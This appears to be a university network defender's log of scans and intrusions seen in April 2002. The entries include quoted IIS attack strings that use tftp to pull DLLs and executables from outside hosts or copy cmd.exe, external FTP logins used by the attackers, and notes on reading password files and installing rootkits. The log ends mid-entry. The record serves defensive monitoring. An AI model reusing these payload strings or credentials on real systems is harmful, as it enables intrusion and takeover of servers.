Short summary of some of the attacks against us for Apr. 2002 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2002/04/01-02:54:02.90 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) scannet for port 137,161 2002/04/01-02:58:26.79 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) ICMP timestamp request scan of 132.235.2.x 2002/04/01-02:58:26.80 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) ICMP info request scan of 132.235.2.x 2002/04/01-04:13:56.28 61.177.253.33 (CHINANET Jiangsu province network,CN) attack IIS w/buff overflow=tftp%20-i%20132.0.0.7%20GET%20Admin.dll%20c 2002/04/01-06:00:00.00 202.188.74.15 (sp-74-15.tm.net.my) continue to run irc reflector on hacked machine all day long. Also try to get root 2002/04/01-06:56:50.28 166.104.123.116 (Hanyang University, SEOUL,KR) scannet fo rport 21 2002/04/01-07:45:00.33 62.163.229.100 (a229100.upc-a.chello.nl) scannet with ping 2002/04/01-07:45:00.77 62.163.229.100 (a229100.upc-a.chello.nl) scan severl ips for port 1433 2002/04/01-11:03:00.11 62.211.25.228 (Telecom Italia Net,IT)scannet for port 21 2002/04/01-11:13:58.19 128.122.20.205 (CSSTUPC1.CS.NYU.EDU) scannet for port 21 2002/04/01-13:40:54.29 210.187.192.133 (TMnet Telekom Malaysia,MY) ping scan of net 2002/04/01-13:49:34.67 210.187.192.133 (TMnet Telekom Malaysia,MY) scannet fo rports 79,161,1524 2002/04/01-14:51:22.01 142.154.129.14 (lon-on52-014.netcom.ca) SCAN NET FOR PORT 137 2002/04/01-16:47:39.22 195.127.27.16 (linux1.alltec.org) scannet for port 21 2002/04/01-17:22:13.01 138.89.61.227 (pool-138-89-61-227.mad.east.verizon.net) SCAN NET FOR PORT 137 2002/04/01-18:37:32.19 24.208.179.213 (dhcp024-208-179-213.columbus.rr.com) scannet for port 21, anon ftp attack 2002/04/01-23:01:20.57 209.88.66.241 (CABLE & WIRELESS ANTIGUA,ST. John, AG) scannet for port 22 2002/04/02-07:16:43.12 194.204.218.148 (Ministere des Affaires Etrangeres et de la Cooperation,MA) scannet for port 137 2002/04/02-08:20:47.57 24.188.166.166 (ool-18bca6a6.dyn.optonline.net) scannet for ports 137,445,139 2002/04/02-10:45:40.04 141.155.35.11 (pool-141-155-35-11.ny5030.east.verizon.net) scannet for ports 137,139,and heavy on 534 2002/04/02-12:32:34.07 132.235.238.1 (admin.memaud.ohiou.edu) scan 132.235.*:38293 2002/04/02-12:58:38.96 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/04/02-13:46:06.85 66.130.72.141 (modemcable141.72-130-66.sherb.mc.videotron.ca) scan select ips on port 21,anon ftp 2002/04/02-13:48:01.01 12.81.86.66 (66.san-francisco-05-10rs.ca.dial-access.att.net) scan 132.235.16.*:137 2002/04/02-14:18:20.41 64.229.152.132 (HSE-Ottawa-ppp163049.sympatico.ca) scannet for ports 137,524,139 2002/04/02-15:13:37.04 131.164.182.202 (0x83a4b6ca.virnxx9.adsl-dhcp.tele.dk) an 132.235.16.*:137 2002/04/02-18:41:42.25 61.177.254.51 (CHINANET Jiangsu province network,CN) 1. scannet for port 80, 2002/04/02-18:41:42.25 61.177.254.51 (CHINANET Jiangsu province network,CN) 2. attack =tftp%20-i%20132.235.80.92%20GET%20Admin.dll 2002/04/02-19:55:27.10 210.110.144.38 (Tongmyong University of Information Technology,KR) scannet for port 53 04/03-10:29:10.03 203.129.231.196 (STPI-Nagpur's Network,IN) scan 132.235.16.*:137 04/03-11:38:00.04 212.179.202.92 (bzq-202-92.red.bezeqint.net) scan 132.235.*.*:80 04/03-13:10:15.07 141.152.145.73 (pool-141-152-145-73.norf.east.verizon.net) scan 132.235.16.*:137 04/03-17:09:39.04 213.73.189.175 (qn-213-73-189-175.quicknet.nl) scan 132.235.*.*:80 04/03-21:25:07.10 61.177.246.179 (CHINANET Jiangsu province network,CN) scan 132.235.*.*:80 04/04-04:50:26.22 80.135.82.109 (p5087526D.dip.t-dialin.net) scan 132.235.*.*:80 2002/04/02-20:30:50.07 12.74.100.242 (242.dallas-11-12rs.tx.dial-access.att.net) scan 132.235.16.*:137 2002/04/03-01:08:39.95 216.153.137.152 (host-216-153-137-152.choiceone.net) scanent for prot 515 2002/04/03-02:03:03.01 12.86.88.186 (186.birmingham-01-02rs.al.dial-access.att.net) scan 132.235.16.*:137 2002/04/03-03:10:20.70 216.167.144.189 (www.floyd.k12.nm.us) scannet for port 111 2002/04/03-03:17:12.23 198.67.10.169 (UNITY SOFTWARE SYSTEMS ,AZ,US) scannet for port 111,rstatd 2002/04/03-03:46:00.16 61.177.246.64 (CHINANET Jiangsu province network,CN) 1. scannet for port 80, 2002/04/03-03:46:00.16 61.177.246.64 (CHINANET Jiangsu province network,CN) 2. attack =tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20e:\Admin.dll 2002/04/03-05:00:43.47 198.67.10.169 (UNITY SOFTWARE SYSTEMS ,AZ,US) start of buff overflow attacks -sadmind 2002/04/03-07:18:59.76 217.227.183.138 (pD9E3B78A.dip.t-dialin.net) scannet fo rport 80 2002/04/03-09:32:26.61 210.83.251.95 (China Netcom Corp.,CN) netscan port 80, attack iis tftp%20-i%20132.102.65.99%20GET%20Admin.dll 2002/04/03-09:43:35.10 24.202.96.150 (modemcable150.96-202-24.mtl.mc.videotron.ca) scannet for port 21,anon ftp attack 2002/04/03-10:13:34.13 209.128.161.226 (209-128-161-226.dial-up.ipa.net) scan 1 ip for port 21, 6000 2002/04/03-11:36:46.66 212.179.202.92 (bzq-202-92.red.bezeqint.net) scannet for port 80 2002/04/03-13:38:52.43 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) slow scannet for port 524 2002/04/03-15:40:05.50 209.128.161.226 (209-128-161-226.dial-up.ipa.net) scan 2 ips for port 21, 6000 2002/04/03-15:46:20.05 132.235.90.7 (?.ohou.edu) scannet for port 38293 UDP 2002/04/03-17:07:33.36 213.73.189.175 (qn-213-73-189-175.quicknet.nl) scannet for port 80 2002/04/03-19:26:45.84 209.128.161.221 (209-128-161-221.dial-up.ipa.net) scan 1 ip for port 21, 6000 2002/04/03-21:40:01.39 209.128.161.254 (254128-161-226.dial-up.ipa.net) scan 1 ip for port 21, 6000 2002/04/04-02:22:06.76 61.177.253.29 ((CHINANET Jiangsu province network,CN) scannet for port 80,attack =tftp%20-i%20132.235.80.92%20GET%20Admin.dll 2002/04/04-04:49:44.09 80.135.82.109 (p5087526D.dip.t-dialin.net) scannet for port 80 2002/04/04-07:28:19.52 218.2.20.131 (CHINANET Jiangsu province network,CN) 1. scannet for port 80 (iis sevrvers) 2002/04/04-07:28:19.52 218.2.20.131 (CHINANET Jiangsu province network,CN) 2. attack IIS w/ tftp%20-i%20132.237.7.175%20GET%20Admin.dll 2002/04/04-07:50:34.50 213.149.165.188 (adsl-165-188.cytanet.com.cy) scannet for port 21,anon ftp attack 2002/04/04-10:05:26.63 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/04/04-12:37:53.71 203.204.162.240 (u162-240.u203-204.giga.net.tw) scan several ips for port 21 2002/04/04-12:37:59.42 203.204.162.240 (u162-240.u203-204.giga.net.tw) scannet for port 21 2002/04/04-12:45:35.60 211.159.31.98 (GuangDong Gosun Internet Information & Technology evelopment Co,CN) scan 132.235.*.8:1524 2002/04/04-16:10:57.41 141.211.28.138 (bus-print1.bus.umich.edu) ping scan of net 2002/04/04-16:16:57.59 141.211.28.138 (bus-print1.bus.umich.edu) scannet for port 3389 2002/04/04-20:40:09.29 80.135.82.109 (p5087526D.dip.t-dialin.net) ping scan of several ips 2002/04/05-02:03:18.26 216.78.86.33 (host-216-78-86-33.gnv.bellsouth.net) scannet for port 80 2002/04/05-04:51:27.34 61.177.255.54 (CHINANET Jiangsu province network,CN) 1. scannet for port 80 2002/04/05-04:51:27.34 61.177.255.54 (CHINANET Jiangsu province network,CN) 2. iis attack tftp%20-i%20132.235.80.92%20GET%20Admin.dll 2002/04/05-05:43:44.97 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) start of daily scans of net for port 524 2002/04/05-06:18:33.31 217.128.47.110 (AVelizy-103-1-3-110.abo.wanadoo.fr) scannet for port 21 2002/04/05-06:18:33.72 217.128.47.110 (AVelizy-103-1-3-110.abo.wanadoo.fr) scannet for port 21 2002/04/05-14:21:16.65 132.235.178.169 (dhcp-178-169.south-green.ohiou.edu) slowscan - netbios name query 2002/04/05-14:59:48.85 213.171.35.98 (Network for Set` 21,RU) scannet for port 21 2002/04/05-15:53:09.40 141.76.1.122 (proxy2.anon-online.org) 1.attack IIS server w/buff overflow cmds to create bat file with commands: 2002/04/05-15:53:09.40 141.76.1.122 (proxy2.anon-online.org) 2."ftp.mitglied.lycos.de 21","chromeangel1" "fettcrass" 2002/04/05-15:53:09.40 141.76.1.122 (proxy2.anon-online.org) 3."get serv-u.exe" "get serv-u.ini" "quit" 2002/04/06-01:20:33.63 24.184.145.246 (ool-18b891f6.dyn.optonline.net) scan 132.235.201.168 ports 27374,12345,139 2002/04/06-01:36:31.54 216.153.136.122 (host-216-153-136-122.choiceone.net) scannet for port 21 2002/04/06-04:45:16.67 68.48.241.50 (pcp736242pcs.reston01.va.comcast.net) scannet for port 21 2002/04/06-08:45:45.47 61.251.171.111 (N-CASH,SEOUL,KR) scannet for port 22 2002/04/06-13:14:11.40 203.75.114.184 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21 2002/04/06-16:22:03.19 141.76.1.121 (proxy1.anon-online.org) 1. download serv-u.exe, serv-u.ini 2002/04/06-16:22:03.19 141.76.1.121 (proxy1.anon-online.org) 1. iis server attack - ftp to 213.193.0.36 chromeangel1/fettcrass 2002/04/06-16:51:49.74 209.235.58.117 (117-209.235.58.interliant.com) scannet for port 515 2002/04/06-19:46:57.04 61.177.253.142 (CHINANET Jiangsu province network,CN) IIS buff overflow -tftp%20-i%20132.235.80.92%20GET%20Admin.dll 2002/04/06-21:00:44.31 63.136.113.198 (Cable and Wireless LTD -Cayman,KY) scannet for port 21,anon ftp attacks 2002/04/06-21:52:30.05 64.105.205.140 (h-64-105-205-140.CMBRMAOR.covad.net) scannet for port 21 2002/04/06-23:09:30.49 210.186.52.32 (TMnet Telekom Malaysia,MY) ftp 210.49.1.200 scott/koold00d get psybnc stuff from .sbin 2002/04/06-23:09:30.49 210.186.52.32 (TMnet Telekom Malaysia,MY) ftp to 211.239.122.9 hurim/d00msday get psybnc stuff from .sbin 2002/04/06-23:09:30.49 210.186.52.32 (TMnet Telekom Malaysia,MY) logon to condor using multiplt stollen passwd 2002/04/07-03:54:14.50 211.43.165.212 (E2B,SEOUL,KR) 1. probe condir with finger; login as mcgeem. look around. 2002/04/07-03:54:14.50 211.43.165.212 (E2B,SEOUL,KR) 2. buff overflow attack directly at condor, try to setup inetd on listen port 2002/04/07-03:54:14.86 211.43.165.212 (E2B,SEOUL,KR) ftp to condor, put sun1.tar on /var/tmp. 2002/04/07-06:11:26.22 216.110.167.66 (CyberGate, Inc,FL,US) scannet for port 21 2002/04/07-13:16:19.58 132.235.178.169 (dhcp-178-169.south-green.ohiou.edu) slowscan - netbios name query 2002/04/07-23:15:31.12 61.177.246.207 (CHINANET Jiangsu province network) IIS server attack - tftp%20-i%20132.235.80.92%20GET%20Admin.dll 2002/04/08-05:59:09.45 61.142.135.43 (CHINANET Guangdong province network)1. scan net for port 80, IIS attack w/comman 2002/04/08-05:59:09.45 61.142.135.43 (CHINANET Guangdong province network)2. tftp%20-i%20132.116.64.182%20GET%20cool.dll%20c:\httpodbc.dll 2002/04/08-06:17:58.13 132.72.135.100 (cim.bgu.ac.il) 1. scan net for port 80, IIS attack w/comman 2002/04/08-06:17:58.13 132.72.135.100 (cim.bgu.ac.il) 2. tftp%20-i%20132.72.135.100%20GET%20cool.dll%20c:\httpodbc.dll 2002/04/08-08:13:48.72 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for port 137 - netbios name query 2002/04/08-17:12:09.12 206.230.62.10 (SPRINT,VA,US) scannet for port 21 2002/04/08-17:27:43.56 62.62.190.211 (9 Telecom,FR) scannet for port 21 - anon ftp attack 2002/04/08-17:47:39.96 156.35.88.172 (fanae02.geol.uniovi.es) scannet for port 21 2002/04/08-20:13:25.16 203.255.180.157 (real.ewha.ac.kr) scannet for port 22 2002/04/08-20:30:25.18 80.141.62.50 (p508D3E32.dip.t-dialin.net) ping scan of net 2002/04/08-23:03:19.20 61.177.246.113 (CHINANET Jiangsu province network) 1. scan net for port 80, IIS attack w/comman 2002/04/08-23:03:19.20 61.177.246.113 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20e:\Admin.dll 2002/04/08-23:40:31.94 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia,MY) 1. scannet for ports 79,161,1524 2002/04/08-23:40:31.94 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia,MY) 2. try to login to selected ips w/ password = loginid 2002/04/09-02:14:55.16 212.185.253.130 (cw02.D1.srv.t-online.de) scan 6 ips for port 80 2002/04/09-02:15:09.64 212.185.253.140 (cw08.D1.srv.t-online.de) scan 9 ips for port 80 2002/04/09-02:15:12.46 212.185.253.139 (cw07.D1.srv.t-online.de) scan 7 ips for port 80 2002/04/09-02:15:28.89 212.185.253.137 (cw05.D1.srv.t-online.de) scan 5 ips for port 80 2002/04/09-03:03:23.30 167.206.47.44 (WENDELL.CONCISION.COM) scannet for port 22 2002/04/09-03:27:47.50 132.234.96.82 (bc405.ocsstud.gu.edu.au) scannet for p[ort 137 - netbios name query 2002/04/09-04:17:25.11 24.27.182.214 (cvg-27-182-214.cinci.rr.com) scannet fo rport 12345 2002/04/09-05:23:25.87 80.14.43.19 (ASt-Lambert-102-1-5-19.abo.wanadoo.fr) scannet for port 21 2002/04/09-06:07:02.35 80.11.207.67 (AAnnecy-101-1-5-67.abo.wanadoo.fr) scannet for port 21 - anon ftp attack 2002/04/09-09:48:21.99 132.235.94.25 (stupidity at ohiou.edu) scannet for port 41524 2002/04/09-15:08:31.55 213.106.143.133 (public1-warr2-5-cust133.manc.broadband.ntl.com) scannet for port 80 2002/04/09-16:12:38.96 217.82.231.30 (pD952E71E.dip.t-dialin.net) scannet for port 80,heavy IIS attacks 2002/04/09-18:10:02.13 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for port 137 2002/04/09-18:19:06.69 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for ICMP Address Mask Request,ICMP Timestamp Reques 2002/04/09-19:43:23.21 212.120.82.106 (cp86479-a.dbsch1.nb.nl.home.com) scannet for port 80,heavy IIS attacks 2002/04/09-19:59:34.56 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for NETBIOS Samba clientaccess 2002/04/09-21:01:58.64 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for port 139,445 2002/04/09-23:36:52.33 166.90.225.10 (dialup-166.90.225.10.Dial1.Detroit1.Level3.net) scannet for NETBIOS SMB C access 2002/04/10-00:56:54.28 202.185.243.121 ((Ins Peny Minyak K.Sawit M'sia,MY) scannet for ports 79 (user=123),161,1524, ping 2002/04/10-01:28:20.84 202.185.243.121 ((Ins Peny Minyak K.Sawit M'sia,MY) Use finger info to telnet to ips using passwd=loginid 2002/04/10-02:13:47.10 80.133.108.17 (p50856C11.dip.t-dialin.net) scannet for port 80 2002/04/10-02:21:23.76 193.253.230.76 (ALyon-102-1-2-76.abo.wanadoo.fr) scannet for port 21 2002/04/10-03:15:19.22 132.235.168.93 (dhcp-168-093.west-green.ohiou.edu) probe 132.235.1.[1,12] port 21 2002/04/10-04:39:04.11 200.24.70.26 (IFX networks,BOGOTA,CO) scannet for port 21 2002/04/10-08:26:36.12 198.234.252.9 (oarnet...) multiple anon ftp atttempts 2002/04/10-09:09:58.16 193.253.215.84 (AMontpellier-201-1-2-84.abo.wanadoo.fr) scannet for port 21 2002/04/10-14:26:27.28 212.211.83.35 (fra-tgn-oyd-vty35.as.wcom.net) a-PPPdialup,DE, start attack endor w/ telnet buff overflow attacks 2002/04/10-14:32:29.03 212.211.83.35 (fra-tgn-oyd-vty35.as.wcom.net) access endor port 2001 cat /etc/passwd,shadow 2002/04/10-14:41:51.34 130.15.96.39 (portia.psyc.QueensU.CA) use cracked acct on endor, download sun.tar.Z 2002/04/10-14:48:40.96 212.211.83.35 (fra-tgn-oyd-vty35.as.wcom.net) telnet in and install rootkit in /usr/share/man/man1/.lc 2002/04/10-16:11:47.27 217.136.112.229 (adsl-61669.turboline.skynet.be) scannet for port 21 - anon ftp attack 2002/04/10-17:01:06.84 217.136.112.229 (adsl-61669.turboline.skynet.be) re-scannet for port 21 - anon ftp attack 2002/04/10-23:04:42.89 132.208.21.68 (Universite du Quebec a Montreal,CA) scan net for port 21 2002/04/11-11:58:43.93 210.103.80.10 (BUIL ELECTRONIC HIGH SCHOOL,KR) scannet for port 21 2002/04/11-14:43:45.46 210.3.1.215 (Hutchison Global Crossing Ltd.,HK) scannet for port 21 2002/04/11-15:13:35.84 211.219.153.206 (KOREA TELECOM,KR) scannet for port 21 2002/04/11-16:24:13.77 216.47.159.136 (host136.cslab.iit.edu) scannet for port 21 2002/04/11-18:31:41.61 195.232.60.10 (fra-tgn-ozb-vty10.as.wcom.net) 1.back hacking on endor. ftp to 206.47.72.55 leggimi/100582 2002/04/11-18:31:41.61 195.232.60.10 (fra-tgn-ozb-vty10.as.wcom.net) 2. to get eggbot. install. 2002/04/12-01:37:22.01 24.138.61.171 (SHW61-171.accesscable.net) scannet for port 80 2002/04/12-08:17:52.01 209.165.3.100 (sql.lightspeed.net) scannet for port 21 (SYN/FIN scan) 2002/04/12-10:15:46.25 66.189.162.152 (Charter Communications,MO,US) portscan 132.235.16.236 2002/04/12-14:47:25.79 24.138.61.171 (SHW61-171.accesscable.net) IIS attack tftp.exe+"-i"+24.138.61.171+get+WINLOGIN.EXE+c:\WINLOGIN.EXE 2002/04/12-14:48:51.89 213.29.6.8 (Iran Telecommunication Research Center,iR) scannet for port 21 2002/04/12-16:15:19.40 216.254.162.32 (dialin-162-32.tor.primus.ca) scannet for port 445 2002/04/12-16:15:54.93 213.104.178.254 (m766-mp1-cvx3a.not.ntl.com) scannet for port 445 2002/04/12-16:16:18.93 62.253.12.159 (m159-mp1-cvx1c.edi.ntl.com) scannet for port 445 2002/04/12-16:16:29.48 66.125.96.136 (Starstream Communications,CA,US) scannet for port 445 2002/04/12-16:17:53.10 216.31.6.67 (rdo-dialA-67.zianet.com) scannet for port 445 2002/04/13-01:28:02.91 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia (PORIM),MY) scannet for pos 79,161,1524,ping 2002/04/13-03:04:40.77 211.33.221.132 (Korea crap) scannet for port 21 2002/04/13-04:58:46.56 12.233.26.173 (12-233-26-173.client.attbi.com) scannet for port 445 2002/04/13-06:14:57.53 12.233.26.173 (12-233-26-173.client.attbi.com) scannet for port 445 2002/04/13-07:04:28.19 211.33.221.132 (Korea crap) scannet for port 21 2002/04/13-20:35:28.47 218.44.208.100 (Digital Resource Company,KAMEKICHI,JP) scannet for port 21 2002/04/14-03:59:41.39 195.64.92.180 (cust.92.180.adsl.cistron.nl) ping scan of net 2002/04/14-05:14:06.16 212.194.49.31 (lns03m-2-31.w.club-internet.fr) scannet fo rport 21 2002/04/14-06:05:51.32 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - copy+..\..\winnt\system32\cmd.exe+exchange.exe 2002/04/14-06:05:51.32 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - tftp+-i+195.64.92.180+GET+servudaemon.exe 2002/04/14-06:10:49.66 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - tftp+-i+195.64.92.180+GET+TzoLibr.dll 2002/04/14-06:33:13.76 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - c:\Inetpub\scripts\servudaemon.exe+/u+/h+c:\Inetpub\scripts\servudaemon.ini 2002/04/14-07:00:11.01 217.226.246.105 (pD9E2F669.dip.t-dialin.net) sannet fo rort 80 2002/04/14-07:37:51.52 212.239.200.88 (u212-239-200-88.adsl.pi.be) IIS attack - copy%20c:\winnt\system32\cmd.exe%20testing.exe 2002/04/14-11:12:47.97 207.24.185.233 (Siemens Medical System,IL,US) scannet for port 2008 2002/04/14-22:13:01.90 212.211.91.6 (fra-tgn-oyl-vty6.as.wcom.net) scannet for port 139 2002/04/14-22:53:55.06 66.119.33.167 (proxy.ia4.marketscore.com) 1. IIS attack - copy+C:\winnt\system32\cmd.exe+C:\root.exe 2002/04/14-22:53:55.06 66.119.33.167 (proxy.ia4.marketscore.com) 2. create bat file to ftp to 131.234.20.71 as hack/mich to download 2002/04/14-22:53:55.06 66.119.33.167 (proxy.ia4.marketscore.com) 3. svchost.exe ServUDaemon.ini tlist.exe ncx99.exe httpodbc.dll 2002/04/15-00:02:14.34 66.119.33.167 (proxy.ia4.marketscore.com) hack IIS, run ftpd USER Equa/kalahari, login from 217.85.118.92 2002/04/15-09:53:27.89 217.85.83.225 (pD95553E1.dip.t-dialin.net) scannet for port 80 2002/04/15-09:54:59.26 217.85.83.225 (pD95553E1.dip.t-dialin.net) scannet for port 80 2002/04/15-11:49:44.98 12.101.145.18 (18.muba.chrt.washdctt.dsl.att.net) scannet for port 22 2002/04/15-11:56:40.63 211.184.14.160 (Seoul Kongduk Elementary School,SEOUL,KR) scannet for port 21 2002/04/15-12:34:58.00 200.217.161.50 (Brazil hacker) scannet for ports 21,5555,6112,ping 2002/04/15-12:40:27.14 170.210.128.99 (srvuai.pab.unrc.edu.ar) buff overflow attack port 6112 2002/04/15-12:50:48.77 212.58.172.166 (qn-212-58-172-166.quicknet.nl) hack IIS server, install ftp daemon USER DFXP-Team/Filler 2002/04/15-14:34:44.65 217.227.151.151 (pD9E39797.dip.t-dialin.net) scannet for port 80 2002/04/15-16:29:18.69 217.57.45.98 (CEMENTERIA DI MONSELIE SPA,IT) scannet for port 80 2002/04/15-21:50:17.29 24.163.136.247 (wks-163-136-247.kscable.com) portscan 132.235.1.169 2002/04/15-22:06:54.65 212.211.85.28 (fra-tgn-oyf-vty28.as.wcom.net) buff overflow attacks, port 6112, against selected ips 2002/04/16-07:13:39.65 80.26.13.125 (80-26-13-125.uc.nombres.ttd.es) scant 132.235.3.13 : 443 2002/04/16-09:15:12.60 80.26.13.125 (80-26-13-125.uc.nombres.ttd.es) scant 132.235.17.13 : 443 132.235.19.13 : 443 2002/04/16-11:13::00.65 207.71.92.221 (shieldsup.grc.com) portscan 132.235.19.(64,19,) 2002/04/16-12:15:23.53 217.57.45.98 (CEMENTERIA DI MONSELIE SPA,IT) 1. scannet for port 80, IIS buff overflow attack 2002/04/16-12:15:23.53 217.57.45.98 (CEMENTERIA DI MONSELIE SPA,IT) 2. cmd = copy+\winnt\system32\cmd.exe+root.exe 2002/04/16-14:36:45.88 66.110.151.89 (adsl-66.110.151-89.globetrotter.net) scanent for port 80 2002/04/16-14:36:45.88 66.110.151.89 (adsl-66.110.151-89.globetrotter.net) scanent for port 80 2002/04/16-16:53:07.54 129.71.155.236 (West Virginia Network for Educational Telecomputing,WV,US) scanent for port 80, ping 2002/04/16-20:53:33.97 80.202.5.43 (80-202-5-43.dd.nextgentel.com) scannet for port 21 anon ftp attack 2002/04/17-05:28:08.58 203.198.112.254 (awork086254.netvigator.com) try to login to 132.235.17.1 as root/root 2002/04/17-07:28:36.13 63.11.20.233 (1Cust233.tnt11.sfo8.da.uu.net) scanent for port 80 2002/04/17-10:17:00.11 80.131.155.65 (p50839B41.dip.t-dialin.net) scannet for port 80 2002/04/17-12:04:19.40 195.64.92.180 (cust.92.180.adsl.cistron.nl) scannet for port 80 2002/04/17-12:25:09.19 129.71.155.236 (West Virginia Network for Educational Telecomputin,WV,US)scannet for port 80, IIS attack 2002/04/17-14:45:09.61 203.85.142.174 (pc174.timeproject.com.hk) scannet for port 21 2002/04/17-22:29:55.76 217.82.64.168 (pD95240A8.dip.t-dialin.net) scannet for port 21 2002/04/18-08:09:57.17 61.171.121.239 (CHINANET Shanghai province network,CN) scannet for port 80 2002/04/18-12:40:48.70 216.208.174.40 (Telesat Canada,ONTARIO,CA) scannet for port 21 2002/04/18-13:47:37.48 65.32.118.214 (6532118hfc214.tampabay.rr.com) scannet for port 21 2002/04/18-14:09:53.362831 80.132.185.26 (p5084B91A.dip.t-dialin.net) scannet for port 80 2002/04/18-14:44:02.834150 199.232.242.249 (miami-gnap-ip-199242-249.dynamic.ziplink.net) scannet for port 25 2002/04/18-15:21:10.78 203.85.142.174 (pc174.timeproject.com.hk) scannet for port 21 2002/04/18-15:33:44.61 80.14.210.110 (ALille-205-1-2-110.abo.wanadoo.fr) scannet for port 21,anon ftp attacks 2002/04/18-18:13:40.00 65.190.16.185 (dsl-65-190-16-185.telocity.com) scannet w/ netbios-name-query 2002/04/18-19:03:12.78 24.197.75.8 (wv-pkbrg-ubr-a-024-197-075-008.charterwv.net) scannet for port 1433 2002/04/18-22:05:23.251065 66.87.32.125 (cpe-66-87-32-125.ok.sprintbbd.net) scannet for port 22 2002/04/19-01:25:36.15 213.23.88.2:53 (svdns01.es-tec.net) scannet for port 53 2002/04/19-04:16:18.550024 200.72.3.36 (ENTEL CHILE S.A.,Santiago,CL) scannet for port 80 2002/04/19-08:07:19.03 207.219.210.250 (Lanis Corporation,ONTARIO.CA) scannet for port 80 2002/04/19-08:55:28.19 132.203.46.106 (ip-46-106.fsa.ulaval.ca) IIS attac, tftp%20-i%20132.203.46.106%20GET%20cool.dll%20d:\httpodbc.dll 2002/04/19-09:31:17.99 62.219.196.200 (bzq-196-200.lns.bezeqint.net) scannet for port 80 2002/04/19-09:44:15.03 200.72.3.36 (ENTEL CHILE S.A.,CL) scannet for port 80, sadmind worm access 2002/04/19-10:30:02.05 80.132.172.43 (p5084AC2B.dip.t-dialin.net) scannet for port 80 2002/04/19-15:55:49.70 211.184.128.70 (korea crap) scannet for port 22 2002/04/19-21:54:04.51 62.211.185.51 (Telecom Italia,IT) ping scan of net, scannet for port 21 2002/04/19-22:16:03.48 192.168.39.244 (mac addr = router) scannet for port 111 2002/04/20-06:41:49.41 148.245.169.2 (computadora.rasa.com.mx) scannet for port 21 2002/04/20-10:17:17.84 217.136.154.82 (adsl-72274.turboline.skynet.be) scannet for port 21, anon ftp attack 2002/04/20-15:55:57.86 65.221.79.23 (Frognet, Inc.,OH,US) scannet for port 21 2002/04/20-17:13:01.37 80.11.175.231 (ALille-205-1-1-231.abo.wanadoo.fr) scannet for port 21 2002/04/20-19:32:16.15 65.94.209.189 (MTL-HSE-ppp197093.qc.sympatico.ca) scannet for port 21 2002/04/20-23:14:01.72 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) portscan machiens for port 21,22,137 2002/04/21-03:12:48.80 148.221.36.254 (dup-148-221-36-254.prodigy.net.mx) ping scan of net 2002/04/21-03:12:58.45 148.221.36.254 (dup-148-221-36-254.prodigy.net.mx) scannet for port 21 2002/04/21-04:44:13.96 65.94.209.189 (MTL-HSE-ppp197093.qc.sympatico.ca) scannet for port 21 2002/04/21-10:34:59.09 151.197.50.247 (pool-151-197-50-247.phil.east.verizon.net) scannet with ping 2002/04/21-10:40:49.04 194.152.130.65 (mail.kossuth-klub.hu) scannet for port 21 2002/04/21-10:43:33.69 61.76.220.234 (korea crap) scannet for port 21 2002/04/21-10:48:10.70 151.197.50.247 (pool-151-197-50-247.phil.east.verizon.net) scannet with netbios-name-query 2002/04/22-06:52:24.89 65.94.248.2 (MTL-HSE-ppp206812.qc.sympatico.ca) scannet for port 21 2002/04/22-10:18:33.23 212.185.253.129 (cw01.D1.srv.t-online.de) scannet for port 80, whisker space splice attack 2002/04/22-10:44:05.46 211.21.252.74 (CHTD, Chunghwa Telecom Co.,Ltd,TW) scannet for port 21 2002/04/22-10:44:24.82 211.21.252.74 (CHTD, Chunghwa Telecom Co.,Ltd,TW) scannet for port 21 2002/04/22-12:13:57.32 80.136.209.148 (p5088D194.dip.t-dialin.net) scannet for port 80 2002/04/22-14:01:30.63 217.120.164.18 (cc31218-a.groni1.gr.nl.home.com) 1. attack IIS server with buff overflow cmds 2002/04/22-14:01:30.63 217.120.164.18 (cc31218-a.groni1.gr.nl.home.com) 2. using echo to build file \inetput\scripts\uplodad.asp 2002/04/22-18:38:21.20 61.197.216.58 (yugen-kaisha Shinjuku-Soft,JAPAN) scannet for port 21 2002/04/22-20:25:03.08 140.112.17.106 (donald.ee.ntu.edu.tw) scannet for port 80 2002/04/22-21:23:12.27 216.190.255.235 (Wasatch Hosting,UT,US) scannet for port 25 2002/04/22-21:48:45.24 65.94.248.2 (MTL-HSE-ppp206812.qc.sympatico.ca) scannet for port 21,anon ftp attack 2002/04/23-00:05:09.76 24.205.120.236 (24-205-120-236.wc-dyn.charterpipeline.net)scannet for port 80,NETBIOS SMB C access 2002/04/23-00:05:57.73 65.93.96.3 (Kitchener-HSE-ppp3563614.sympatico.ca) scannet for port 80,NETBIOS SMB C access 2002/04/23-00:08:42.09 65.93.96.3 (Kitchener-HSE-ppp3563614.sympatico.ca) scannet for port 139 2002/04/23-01:56:20.35 203.90.87.146 (HCL Infinet Limited,IN) scannet for port 80,NETBIOS SMB C access 2002/04/23-03:01:48.28 141.158.2.220pool-141-158-2-220.phil.east.verizon.net) scannet for port 80,NETBIOS SMB C access 2002/04/23-03:07:40.57 62.31.152.87 (pc-62-31-152-87-fn.blueyonder.co.uk) scannet for port 80,NETBIOS SMB C access 2002/04/23-05:06:46.97 217.208.61.101 (h101n2fls32o883.telia.com) scannet for port 21 2002/04/23-05:07:20.16 